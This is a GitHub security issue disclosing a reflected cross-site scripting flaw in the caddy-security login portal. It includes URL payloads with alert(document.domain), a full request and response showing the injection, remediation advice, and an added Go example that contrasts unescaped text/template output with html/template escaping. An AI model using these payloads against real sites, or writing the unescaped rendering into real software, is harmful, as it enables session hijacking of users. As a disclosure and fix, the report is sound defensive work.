Reflected Cross-Site Scripting #264

Open
ahpaleus opened this issue Sep 19, 2023 · 0 comments

ahpaleus commented Sep 19, 2023

Severity: High

Reflected XSS occurs when an application includes untrusted data in the HTML response sent to the user’s browser. In this case, the provided /admin%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/admin/login or /settings/mfa/delete/<img%20src=x%20onerror=alert(document.domain)> API calls trigger an alert. An attacker can exploit this vulnerability to execute arbitrary JavaScript code within the target user’s browser, potentially leading to further attacks such as session hijacking.

Example request-response cycle that triggers alert:

GET /adminhxuk8%22%3e%3cscript%3ealert(document.domain)%3c/script%3ecsdz9/admin/login HTTP/2
Host: internal.caddysecurity.portal
Cookie: AUTHP_SESSION_ID=XYZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

HTTP/2 200 OK
Content-Type: text/html
Server: Fly/a0b91024 (2023-06-13)
Date: Wed, 19 Jul 2023 08:07:56 GMT
Via: 2 fly.io
Fly-Request-Id: 01H5PK218K0V14GFS0GB3XDF31-waw

<!DOCTYPE html>
<html lang="en" class="h-full bg-blue-100">
  <head>
    <title>Authentication Portal - Sign In</title>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="description" content="Performs user authentication." />
    <meta name="author" content="Paul Greenberg github.com/greenpau" />
    <link rel="shortcut icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="icon" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/favicon.png" type="image/png" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/google-webfonts/roboto.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/line-awesome/line-awesome.css" />
    <link rel="stylesheet" href="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/css/login.css" />
    
  </head>

  
  


  <body class="h-full">
    <div class="app-page">
      <div class="app-content">
        <div class="app-container">
          <div class="logo-box">
            
              <img class="logo-img" src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/images/logo.svg" alt="Authentication Portal" />
            
            <h2 class="logo-txt">Sign In</h2>
          </div>

          

          
            <div id="authenticators" class="flex flex-col gap-2">
              
                <div>
                  
                    <a href="oauth2/google">
                      <div class="app-login-btn-box">
                        <div class="p-4 bg-[#e53935] text-[white] shadow-sm rounded-l-md text-2xl">
                          <i class="lab la-google la-2x"></i>
                        </div>
                        <div class="app-login-btn-txt">
                          <span class="uppercase leading-loose">Google</span>
                        </div>
                      </div>
                    </a>
                  
                </div>
              
            </div>
          
        </div>
        <div id="bookmarks" class="px-4 hidden sm:block">
          <div onclick="showQRCode('/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/qrcode/login.png');return false;" class="bg-[#24292f] text-[#f6f8fa] py-1 px-1 shadow-xl rounded-b-lg pb-2 text-center" style="max-width: 3em;">
            <i class="las la-qrcode text-3xl"></i>
          </div>
        </div>
        <div id="qr" class="px-4 flex justify-center hidden">
          <div id="qrcode" onclick="hideQRCode();return false;" class="bg-white border border-t-2 py-1 px-1 shadow-xl rounded-b-lg pb-2 max-w-xs inline-flex"></div>
        </div>
      </div>
    </div>
    <!-- JavaScript -->
    <script src="/adminhxuk8"><script>alert(document.domain)</script>csdz9/admin/assets/js/login.js"></script>
    
  </body>
</html>

To immediately address this issue, strategically treat all string values as potentially untrustworthy, regardless of their source, and escape them properly (using the safehtml/template package that generates output-safe HTML).

In addition to that remediation, we also suggest a few different ways to improve defense in depth:

  • Extend unit tests with potentially malicious XSS payloads. Refer to the Cross-site scripting (XSS) cheat sheet for various attack vectors.
  • Consider using the Active Scanner from Burp Suite Professional in a testing environment for all API calls. Additionally, use the scanning with a live task strategy to have underlying requests scanned automatically when interacting with the web interface.
  • Expand the caddy-security documentation to promote security headers—especially the Content Security Policy (CSP) header that controls which resources can be loaded by the browser, limiting the impact of potential XSS attacks.

More information about the issue and our public disclosure:

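The reflection in the response above lands in three different HTML contexts: a URL attribute (href, src), a script src attribute, and a JavaScript string literal inside an onclick handler. That is why the report asks for a context-aware escaper rather than a single blanket encoding. The Go program below is an added example, not part of the issue report and not caddy-security's own code. It renders a constructed, cut-down version of the affected markup twice: once with text/template, which performs no escaping, and once with the standard library's html/template, whose contextual autoescaper applies the same idea as the recommended safehtml/template (URL normalisation in href/src, JavaScript string escaping inside onclick). The request-path handling in basePathFromURL (percent-decoding, then trimming a trailing /login) and the template text are assumptions made for the illustration, not the project's logic.

```go
package main

import (
	"bytes"
	"fmt"
	htmltemplate "html/template"
	"log"
	"net/url"
	"strings"
	texttemplate "text/template"
)

// attackerPath is the request path from the report above: the percent-encoded
// payload sits in the path segment before "/admin/login".
const attackerPath = "/adminhxuk8%22%3e%3cscript%3ealert(document.domain)%3c/script%3ecsdz9/admin/login"

// loginPage is a constructed, minimal stand-in for the affected markup (not
// caddy-security's real template). It reflects the base path into three
// distinct contexts: a URL attribute, a JavaScript string literal inside an
// onclick handler, and a <script src> attribute.
const loginPage = `<link rel="stylesheet" href="{{.Base}}/assets/css/login.css" />
<div onclick="showQRCode('{{.Base}}/qrcode/login.png');return false;"></div>
<script src="{{.Base}}/assets/js/login.js"></script>
`

type pageData struct {
	Base string
}

// basePathFromURL is an assumed, naive way a handler might derive the portal
// base from the request path: percent-decode it and drop the trailing
// "/login" segment. Decoding turns %22%3e%3c back into the raw characters "><,
// so whatever consumes Base now holds attacker-controlled markup.
func basePathFromURL(rawPath string) (string, error) {
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", err
	}
	return strings.TrimSuffix(decoded, "/login"), nil
}

// renderVulnerable uses text/template, which performs no escaping: the
// reflected value lands in the output byte-for-byte, the double quote closes
// the href attribute, and the rest of the payload becomes live markup.
func renderVulnerable(base string) (string, error) {
	t, err := texttemplate.New("login").Parse(loginPage)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, pageData{Base: base}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// renderEscaped parses the identical template with html/template, whose
// contextual autoescaper chooses the encoding per insertion point: URL
// normalisation (%22 %3c %3e %28 %29) inside href/src, and JavaScript string
// escaping (\u0022 \u003c \u003e \/) inside the onclick string literal.
func renderEscaped(base string) (string, error) {
	t, err := htmltemplate.New("login").Parse(loginPage)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, pageData{Base: base}); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// hasRawScriptTag is the kind of check a unit test fed with XSS payloads
// would run over the rendered page: no literal <script> tag may come from input.
func hasRawScriptTag(rendered string) bool {
	return strings.Contains(strings.ToLower(rendered), "<script>alert")
}

func main() {
	base, err := basePathFromURL(attackerPath)
	if err != nil {
		log.Fatal(err)
	}
	vulnerable, err := renderVulnerable(base)
	if err != nil {
		log.Fatal(err)
	}
	escaped, err := renderEscaped(base)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Printf("text/template (raw script tag present: %v):\n%s\n", hasRawScriptTag(vulnerable), vulnerable)
	fmt.Printf("html/template (raw script tag present: %v):\n%s\n", hasRawScriptTag(escaped), escaped)
}
```

Running it prints the two renderings side by side: the text/template output reproduces the broken href seen in the response above, while the html/template output keeps the attribute and the JavaScript string literal intact because the quote and angle brackets are encoded for the exact context they land in. Output escaping stops the injection, but a request path is still an odd source for an asset base; validating it against the configured portal prefix is the complementary fix that keeps the reflected value out of the page altogether.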